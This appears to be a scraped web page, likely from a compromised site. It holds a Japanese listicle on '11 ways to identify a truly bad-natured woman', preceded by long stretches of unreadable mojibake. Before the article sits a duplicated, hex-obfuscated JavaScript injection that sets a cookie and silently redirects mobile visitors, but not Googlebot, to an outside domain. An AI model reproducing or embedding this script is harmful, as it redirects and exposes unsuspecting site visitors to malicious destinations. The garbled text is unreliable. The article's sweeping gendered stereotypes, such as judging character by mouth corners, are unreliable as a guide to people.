a?i??a??a?Ya??ai???ai???a?i??e??ai??i??ei??i??a?i??ai???a?i??ai???a??a??ai??i??ei??i??a?Zai??i??a?i??a??a??ai??i??a?i??a?i??ai??i??a?i??ai??i??

a??a?i??a?i??a??ai???ai??i??a??a??ai??i??ai??i???i??i??a??ai????i???a??a?sa??a??a??ai??Sa??a?i??a??ai??i??ei???ai???ai??i??a?i??a??ai??i??a?i??a??a?i??a?i??ai???e??a?i??a?sei??i??ai??i??a?i??a?i??a??a??a?i??ci??Sa?i??ai??i??a?i??a??a?i??a?i??a?i??a??ai????i???ai???a?i??a??a?Yai??i??a??a?i??ai???ai???a??a??a??a?i??ai??i??a?i??a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

a?i??a??a?i?????ai???a?i??a??a?i??



a?i??a?i??ai??i??a?sa?i??ai???ai??i?????ai???a?Ya?i??a??a?i??a??a?i??ai??i??a??a?i??ai???ai???ai???a??ai???e?za??a?i??a??a?i??a??ai???a?i??a??a?i?????ai???ai???a?i??a??a?i??ai??i??a??ai???a???i??i??a??ci??i??a??ai??i??a?i??a?i??ai???a?i??a??a?i?????ai???a?i??a??a?i??ai???a?i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??

ai??i??a?i??a??a?i??a??ai???ai??????a?i???i??i??ei??i??ai??i??a?i??a?i??ai??i??a?i??a??a?i??a?i??ai??i??

ai??i??a??a?i??ai???ai???ai???a?i?????ai???a?i??ai??i??ai???a?i??ai???ai??i??a?i??a?i?????ai??i??a?i??a??a?i??ai???a?i??a?i??a?i??a??a?i??ai??i??a??ai???a?i??a??a?i??a??a?i??ai???ai???ai???ai??i???i??i??ai???ai??i??a?i??a??a??a?i??a?sai?????i??a??a??ai??i??ai???a?i??ai??i??ai??i??ai???a??a?i??ai??i??a?i??ai??i??

a??a?i??a?i??ai???a??ei??i??ai??i??ai??i??a??a??ai??Sa???i??i??ai???a?i??a?i??a??ai???a??a??a?i??a??a?i????i??ai??i??a???i???a??a?Yai??i??ai???a?i??ai??i???i??i??ai???a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

a??ei??i??ai??i??ei??i??ai??i??ai???a?Ya?i??a??a??a??a?i??ai???a??a??a?i??ai??i??a?i??a?i??ai???a??e??a??ai??i?????ai??i??ei??i??a??ai???a?i??ai??????a?i??a?Sa?i??ai??i??a?Sa??a?i??a?i??ai??i????i??ai??i??a?i??ai??Sai???a??ei??i??ai??i??ei??i??ai??i??ai???a?i??a?i??a?i??ai???a??a?i??a?i??a?i??a?i??ai???a??a??ai??i??a?i??ai??i??ai???a?i??ai??i??ai???a?i??a?i??ai???a??a??a?i??a?Sa?i??a?Sa??a?i??a?i??ai??i????i??ai??i??a?i??ai??Sai???a??ei??i??a?i??ei??i??ai???ai??i??a??a?i??ai????i??i??esZai??i??e??ai??i??a?i???i??i??ai???a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

ci????Z?ai???ai???ai???a??a?i??ai???ai??i??a??a?i??

ai???ai???ai???ai??i??ei??i??a??a?Yai??Sa??a?i??ai??i??a??a??ai?????i??a??a?i??ai??i??ci????Z?ei??i??a??a?i??a??a?i??a?i??a??a?i??ai??i??ai??i??

ai??i??a??a?i??ai???ai???ai???a??a??a?i??e?i??a?i??ai??i??ei??i??ai??i??ai???a?Ya?i??a??a??a??a?i??a?i??a?i??ai????i???a?i??ei??i??ai??i??ai???ai??i??a??ci??Sa?i??a?i??a??a?i??a?i??ai???a?i??ai???ai??Sa?i??a??ai??S?i????i??Ya??cSi???i??i??a??a?i??a?i??ai???a??a?sa??a?i??c?i??a?i??a?Sa?i??ai??i??ai???ai???a?i??a??ei??i??ai???a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

a?i??a??a?i??ai??i??a?i??a?i??ai??i??a??a?i??a?i??a?i??ai???ci??Sa?i??ai??i??a?i??a??a?i??a??ai??i???i??i???i??i??ai??i??a?i??a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

a?i??c?i??a?i??a?Sa?i??ai??i??ei??i??a??a?i??a?i??a?i??a?i??ai???ai??i??a?i??a?sa?i??a??a??a?i??ai???ai???ai???a?????ai???a?i??a??a?i??ai???a??a??a?i???i??i?????a??ai??i??ei?????sa?i??a?i??a??ai??i??a???i???a?i??a??a?i??a??ai????i???a??a?s?i??i??ei??i??ai??i??a?i??a?i??ai??i??a?i??a??a??ai??i??a?i??a??a?i??a?i??ai???ai???ai???ai???a??a??ei??i??ai??i??a???i????i??i??ai???ai??i??a??a?i??ai???ci??i???i??i??a?????ai???ai??i??ai??i??a??a????i???i???ai??i??a?i??a?i??ai???a??a??ai??i???i??i?????a??ai???a??a?i??a?i??ai??i??a?i??a??a?i??ai??i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??

a??a?i??a?i??ai???cSi?????ai??i??ei??i??a?i??a?i??ai??i??ai???ai??Sa?i??a??ci????Z?ai???ai???ai???ai??i???i??i??ai???a??a?i??ai??i??a?i??ai??i??

?i??i??ai??i??ai???a?i??a?i??a?i??a?i??a?i??a?i??a??ai????i??i??a?za??a??a?i??a?sai?????i??a??a??ai???a??a??a??ai???ai??i???i??i??ai???ai???a??a?i??a?i??ai???ai???ai???ai??i??a??ai???a?i??e??a??a??a?i??ai??i??a?i??ai??i??

ai??i??a?i??a?Se??ai??i??a?i??ai???a??a?i??ai???a?i??a?i??a?i??a??a??a??a?i??c?i??ai??i??ai???a?i??a?i??a?i??a??a?i??ai???a??a??ai???a??ai???ai???ai???a?i??a?i??a?Sa?i??ai??i??ai???ai???ai???ai??i??ei??i??ai??i??ai???a?i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??

??i??a??a????i??a?i??ai??i?????ai???ai??i??



ai??i??a?i??a?i?????ai???a?i??a??a?Yai??i??ai???a?i??ai???a?i??ai??????ai???a?i??a?i??a??ai???ai??i??a??a?i??ai???ai???ai???a?i??ci???a??ci??i??a?i??a?i??a?i??a?i??ai???a?sa?i??ai???a?i??ei???ai??i??a?sai???ai???ai???ai???a?i??ci???a?i??ci??i??ai??i??ai???ai???a?Yci???e?i??a??a??a?i??a?i??a??a??ai??sa?i??a?i??a?i??ai??i??

a??a?sai???ai???ai???ai???a??ai???ci??i??ai??i??ai???ai???ai??i??ai???a??a?i??a?i??a?i??a??a?i???i???ai???a??a?i??a??a??a?i??a?i??a??a?i??a?i??a?i??ai?????i??a??a????i??a?i??ai??i??ai???ai???a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

ai??i??a?i?????ai???a?i??a?i??ai??i??a?i??a??ai??i??c??e??a?i??ai???a??a?s??i??ai??i??i?i????i??ai???ai???ai????i???ai???a?i??a??a?Yai??i??i?i????i??ai???i?i????i??a??ai???ai???a?i??a?i??a??ai???ai??i??a?i??a?sa?i????i??ai??i??ai???a?i??ai???ai???a?i??ai?????i??a??a?i??ai??i??i?i??ai???a??a??a??ai??i???i??i??ai???a?i??ai?????i??a??a??ai??i??a?i??a?i??ai???a?i??a??a?i??a?i??ai??i??a?i??a??ai??i??ai???a?i??ai?????i??a?i??ei???a?i??a?i??ai??i??a??a?i??ai??i??ai???a?i??a?i??ai???ai???a?i??a???i??i??ai???a?i??a??a?i??a?i??a?i??ai??i??

a??a?i??a?i??ai???a?i??ai???a??a??ai??i???i???ai???a?i??a??a?i??ai????i??i?????a??a??ai???a??a??ai??Sa??a?i??a?i??ai?????i??a??a?sa?i??ai???a????i??a??a?i??c?i??a?i??a?i??a?i??ai???ci??i??a??ai??i??a??ai???a?i??a?i???i??Ya??a??a?i??a?i??a?i??ai???a??a??a?i??a??a??a?i??ai??i???i??i??a?????a?i??a??ai??i??a?i??a?i??ai??i??a?i??ai??i??

ai???a?i??a??a?i??a?sa?i??a?i??ai??i??

??i??ai??i??ai???a?i??ai???ai???a?i??a?i??ai???a??a??a??ai???ai??i??a??ai??i??ai???a??e?i??a??a?Yai??i??a?i??ai???a?i??ai???a?sa?i??ai???ai??i?????ai???a?i??ai??i??ai???a?i??a?i??a?i??a??ai?????i??a??a?i?????ai???a??ai???a?i??a??a?i??ai??Sa??ai???ei??i??a?i??a?i??ai???a?i??a?sai???a?i??ai??i??ai???a?i??a?i??a?i??ai??i?????ai???a?i??a??a?i??ai??i??a?i??ai??i??

a??a?i??e?i??ai??i??ci??Ya?i??ai??i??a??a?i??ai??Sa?i??ai??i??a?i??a?Yai??Sai???a?i??ai??i??a?i??a???i??i??ci??i??a?i??a??a??a?Yai??Sa?i??a?Yai??i??ai???a??a?i??e?i??a????i???i???a?i???i???a?i??ai???a?i??a??ai??Sai???ai??i??a??ai???ai???a?i??a??a?i??a?i??a??a?i??ai??i??a?za??a??ai??i??a?i??ai??i??a?i??ai???a??a?i??ai??i??a?i??ai???a?i??ai???ai??Sa??a?i??e?i??a?i??ci????i??i??a?i??a?i??ai??i??ci??i???i??i??ai??i??ai???a??a??a??a?i??a?i??ai???a?i??a?i???i???a?i??a?i??a?i??ai??i??a?i??a?i??i?Y

ai??i??a??a?i??ci????i??i??ai??i??a?i??ai??i??ci??i???i??i??a?i??a??ai???a??a?i??e?i??ai??i????i??ei???a?i???i???a?i??ai???a?i??a?i??a?i??ai??i??a??a?i??a?i??a??ai???a??a?i??ai??i??a??e?i??a??a?i??ai??i??e?Ze?i??a?i??a??a??a?i??a?i??a?i??ai???a?i??a??a?i??ai??Sa??ai???a?i??ai??i??a?i??a?i??a?i?????ai???a?i??a??a?i??ai??i??a?i??ai??i??

ai??i??a??a??ai???a?i??a?i??ai???a?i???i???ai??i??cY?ai??i??a??a?i??a???i???a?i??a??a?i??a?i??a?i??ai???ci??i???i??i??a??a?i??a??a?i??ai??Sai???a?i???i???ai??i???i??i??a??ai??i??ai???a?i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??

ai???a??a?i??e?i??a?i??ai???a?i??ai???a?i??ai??Sa?i??ai???a??a?i??a??i??i?i??a?i??a?i??ci???a?i??a??a?i??ai??Sa??a?i??a??ai?????i??a?i??a?i??a??a?i??a??a??a?Yai??i??ai???a?i??a??a?Yai??i??a??a??ai??i??ai??i??ai??i??a?i??a?i??a?i??a?i??ai???a?i??a??a??a?i??ai??i??ai???ai??i??a??ai???ai???ai??i??a?i??e?i??a?i??a?i??ai??i??ai???a??a?i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??a?i??a??a?i??ai??i??a?i??ai??i??

??i??a?i??a?????ai??i??a??a?i??



???ai???a?i??a?i??ai??i??ai?????i??a?i??a?????ai??i??a??a?i??a?i??a??a?i??a?i??a?i??ai??i??

a?i??a?i??ai??i??a?sa?i??ai???ai??i??ai???ai???a?Ya?i??a??a?i??a??a?i??ai???ai???ai???a?i??a?sa?i??ai???a??ai???a??a?YcSi???i??i??a?i??ai???ai???ai???ai???a??a?i??a?i??a??ai???cSi???i??i??a??e?i??a??a?i??a?i??a?i??a?i??a?i??ai??i??a?i??ai??i??

a??a?i??a?i??ai????i???a?i??ei???a??a?Yai??i??a??a?i??a?i??a?i??a??ai???a??ai??i??a??a??a??ai??i??a?i??a?i??a?i??a?i??a?i??ai???ai??i??a?i??a?i??a?i??ai??i??a??ai???ai???ai???a??ci??i??ai??i??a?i??ai??i??a?i??ai???a??a?i??a?i??a?i??ai???ai??i??a??a??ai??Sa??ai??i??a?i??a?i??ai???ai???ai???ai???ai??i??a?sa?i??ai???a?i???i???ai???a?i??a?i??a?i??a??a?i??a?i??a?i??ai??i??

a??a??a??ai??Sa??a?sa?i??ai???ai??i??ai???a?i??ai???ai???a?i??ai???ci??i???i??i??a???i??i?????a??ai???a??a??ai??i??a?i??a?i??a??a??a??ai???a???i??i??ai??i???i??i?????a??ai???a??a?i??a?i??ai??i??a?i??a??a??ai??i??a?i??a?i??ai?????i??ci???a??ei??i??a?i??a?i??a??ai???ai??i??a??a??a?i??ai??i??a??ai???ai???a??ai??i??c??a??ci??i??csi??a?i??a??a??a??ai???ai???a??a??a?i????i??ei???a?i???i???a?i??ai???ai??i??a?i??a??a??a?i??ai??i??ai??i??a?i??a?i??a??ai???a??ci??i??csi??a?i??a?i??ai??i??

ai??i??a??a?i??ai???ai???ai???a?i????i??a?i??a?????ai???a?i??ai???ci??i???i??i??a???i??i?????a??ai???a??a??ai??i??a?i??ai??i??a?i??ai???a??a?i??ai??i??a??ai???a???i??i??a???i??i?????a??a?i??a?i??a??a??ei???ai??i??a??a?i??a?i??a?i??ai???ai??i??a??a??ai??S?i??i??ei??i??ai??i??a?i??a?i??a?i??i?i??a??a?i???i??i??ei??i??ai??i?????a?i??ai??i??a?i??a??a?i??a?i??a?i??ai??i??

ci??i??a??a?i??a?i??e?i??a?i??a??ai??i??a??a?i??

ai??i??a??a??ai??i??a??ai???ai???a?i??a??a?i??a?i??e??ai???ai??i?????a??a?i??a?Sai??Sai???a?i??ai???a?i??ai???ai??i??a?i??a?i??a?i??a?i??ai??i??a???i???a?i??a??a?i??a??ai???a??ai???ai??i??a?i??a??a?i??ai??i??ai???a?i??a??a?i??ai??i??a?i??a??ei???a?i??a?i??a?i??a?i??ai??i??

??i??a??a?i??ai??i??a?i??ai??i??a?i??a??a?i??ai???i?i??i?i??a??a?i??ai??i??a???i??i??a?i??ei????i??i??a?i??a?sai???a??a?sa??ci??i???i??i??a??a?i??a?i??e?i??a?i??a??ai??i??a?sai???a??a??a?i??ai??i??a?i??a?i??ai??i??a??ai???ai???ai??i??a?i??a?i??a??a?i??a?i??a?i??ai??i??

ci??i???i??i??a??a?i??a?i??e?i??a?i??a??a??a?i??ai??i??ai???a??a??a??a?i??ai??i??a?i??a?i??a?i??a?i??a?i??ai???a?i??ai??i??a??a?i??a?i??a?i??ai???a??a?i??e?i??a??a??a?sa?i??a??a?Ya??a??a??a?i??a?i??a??ai??i?????a?i??a??a?i??a?i??ai????i???a?i??ai??i??a??ai???ai???a?i??ai??i??ai???a?i??ai??i??a?i??a??a?i??i?i??i?i??a??a?i??ai??i??ai???a?i??a??a?Ya??a??a??a?i???i??i??a??a??a??ai??i??ai??i??a??a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

ei???a?i??a??a?i??e?i??a??ai??????ai???a?i??ai???a??a??a??a?i??a??a?Ya?i???i??Yei???ai??i??a?i??a?i??a?i??ai??i??a?i??a?i??ai???ai????i???a??ci???a??ei??i??a?i??a??a?i???i??i?????a??ai???a??a?i??a?i??a?Ya?i??ai???a???i???a??a?i??a?i??ai??i??a?i??a?i??ai???a?i??a??a?Yai??i??a??a?i????Ya?i??a?i??a??a??ai??i??ai???a?i??a?i??ai???a??a??a?i???i??i??ai???ai??i??ai???ai??i??ai???a??a?i??a??a?i??ai??i??a?i??ai??i??

a??a?i??a?i??ai??i??a?i??a??a?i??ai???ai??Sai???a??a??a??ai??i??a??ai???ai???a??a??a??a?i??a??a??a?i??a?i??a??a?i??a?i??a?i??ai??i??

a??a??ai???

ai??i??a??a??a?i??ai??i??a??ai???ai???ai???a?i??a??ai??Sa??a?i??e?i??a??ai???a??a??a?i??a??ci??Ya?i??a?Sa?i??a??a?i??ai??i??ai??i??a?i??a??ai??i??a?i??a??a??a??a?i??a?i??ai???ci??i???i??i??a?i??e?i??ai??i??a??ei???ai??i??a?i??a?i??ai??i??

ai??i??a?i??a??a?i??a??ai???ci??i???i??i??a??ei???a?i??a?i????i??ei???a?i??a?Yai???a?i??a??a??a??ai???a??a??a?i??a?i??a??ai??i???i???a?i??ai???a??a?i??a?i??a??a??a?i??a??a??a?i??ai???a?i??a??a?Ya??a?i??a??a?i??e?i??ai??i????i??ei???a?i???i???a?i??ai???a?i??a?i??ai??i??a?i??a??a??a?i??a?i??a?i??ai??i??

a??ai??i??a??a??ai??i???S?a?i??a??a?i??ai???c?i???i???ai??i??a?i??a?i??ai??i??a??ai???ai???a?i??ai??i??a?i??ai??i??i?i??a??a?i??ei???ai??Sa??a?i??ai??i??a?i??i??

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

本当に性格が悪い女の見分け方11選

誰でも性格が悪い女性とは、できるだけ関わりたくないと思うはずです。

ところが知らず知らずのうちに、そんな女性と関わりを持っているかもしれません。

なぜなら、性格の悪さを女性が隠している可能性があるからです。

そのため、男性がそれを見抜くのは至難の技かもしれません。

むしろそんな女性に惹かれやすい傾向があるとも言われています。

じゃあ、どうやって見抜けばいいんだ。」と思う人もいるでしょう。

実は、性格の悪い女性にはいくつか特徴があるとされていますので、今回は本当に性格が悪い女性の見分け方をご紹介したいと思います。

悪口が多い


性格が悪い女性は、悪口が多い傾向があります。

悪口を言うことに対して、悪いと思っていません。

そのため「〇〇ってブスだよね。」「あの人って本当に仕事ができないよね。」「〇〇見てるとイライラするんだよね。」など、次から次へと人の悪口を口に出します。

ただ悪口を言うだけでなく、それを楽しそうに話すような女性は、かなり性格が悪い女性ではないでしょうか。

自分のことが大好き

性格が悪い女性の大半は、自分のことが大好きです。

自分の容姿はもちろんですが、自分の考えが1番正しいと思いこんでいます。

そのため人に何か指摘されても、考えを曲げずに自分の意見を通そうとします。

さらに、自分のことが好きなゆえ「私が何でも中心にいたい。」「私が1番じゃなきゃ嫌。」などと思いこみがちです。

ですから飲み会などのイベント事になると、自分が先頭にたって仕切りたがる傾向があります。

相手によって態度が変わる


性別や年齢、好き嫌いや立場の違いによって、態度をコロコロ変えるのも、性格が悪い女性の特徴です。

自分好みの男性や、仕事の上司、お金持ちの人には、気を遣ったりといい女を演じます。

そのため、裏の顔を知らずに「〇〇ちゃんって、本当に気がきくいい子だよな。」と騙されてしまう男性も多いのです。

ところが、部下や同僚など自分より下の立場と見なした人には、コキを使ったり見下した態度をとります。

また、下の立場の人でなくても、興味のない人には全く気遣いをしません。

人のせいにする

何か悪いことが起きても、性格の悪い女性は反省しません。

たとえそれが自分のミスだったとしても同じです。

なぜなら、自分が悪いと思っていないからなんです。

そのため「私はミスしていません。〇〇さんが間違えてしまったんだと思います。」などと、自分のミスでも人のせいにしてしまいます。

逆にいいことは、自分がやったことでなくても自分の手柄にしようとします。

後輩などの手柄は「私が教えたからでしょ。
などと言って、手柄を取り上げてしまう女性もいるようです。

このような女性は、間違いなく性格が悪い女性ですよね。

相手をデータ化して評価する


性格の悪い女性は、人をデータ化して評価し、相手との付き合いかたを決めるという特徴があります。

例えば男性であれば、見た目や年収、学歴などで相手を評価してしまいます。

女性であれば、お金持ちかどうか、人脈の広さなど自分にプラスになる要素がある人とは、積極的に関わりを持とうとしたりするようです。

そのため評価の良し悪しで、相手の接し方を決めてしまうことも少なくありません。

もし初対面の時に、あなたの経歴について色々聞いてくるようであれば、あなたを評価するための情報収集をしている可能性があります。

ライバルを蹴落とす

仕事やプライベートでライバルがいる場合、手段を選ばずに相手に蹴落とそうとします。

例えば変なウワサを流したり、仕事であればミスをさせるよう仕向けたり。

自分が勝つためなら、相手を蹴落とすことをなんとも思っていない可能性があります。

弱いものイジメをする


自分より下の立場で、少し気に入らない人がいた場合、イジメの標的にする傾向があります。

その内容とは「これお願いね。」とたくさんの仕事を押しつけたり、「あの子って〇〇らしいよ。」と悪いウワサを流したり、「みんな早く行こう。」と仲間外れにしたり。

相手が自分に歯向かえないのをいいことに、弱いものイジメをするのは、性格が悪い証拠ではないでしょうか。

口が軽い

絶対に誰にも言わないから、安心して。」と言っていたとしても、安心してはいけません。

その秘密を話すことで、自分が注目をあびたり、話題の中心になれるとわかれば、人の秘密も「ここだけの話なんだけど」「実はね‥」と簡単にバラしてしまう可能性があるのです。

人の秘密をネタにしてしまうのも、性格が悪いと言えますよね。

口角が下がっている


性格が悪い女性は、何でも自分が正しいと思いがちです。

そのため、普段の生活で不満に感じることが人より多くなりやすいのです。

その不満は、知らずのうちに顔にもあらわれてくる場合があります。

人は苛立っているときや不満を感じると、口角が下がってしまいます。

ですから、口角がいつも下がっている女性には、少し注意したほうがいいかもしれません。

自虐が多い

いわゆる悲劇のヒロインぶる女性です。

相手の同情を誘うような話をして、注目を浴びようとします。

弱い一面を見せて、周りに心配されたり注目を浴びることで満足感を得ているのです。

なかには自分が相手を傷つけていたとしても、あくまでも自分が傷つけられたと嘘のエピソードを話している女性もいるそうです。

このタイプは計算高い女性が多く、男性が騙されてしまいやすい傾向があります。

感謝の気持ちがない


何かしてもらったことに対して、「ありがとう。」という感謝の気持ちがないのも、性格が悪い女性の特徴です。

